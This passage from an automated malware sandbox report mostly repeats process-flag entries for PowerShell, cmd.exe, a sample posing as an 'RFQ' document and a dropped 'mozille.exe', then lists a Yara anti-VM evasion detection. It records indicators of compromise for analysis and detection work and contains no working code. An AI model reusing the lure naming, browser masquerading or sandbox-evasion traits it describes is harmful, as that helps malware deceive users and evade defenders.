                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM3Show sources
                  Source: Yara matchFile source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.mozille.exe.33325b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000002.492375897.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.538688651.00000000033B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
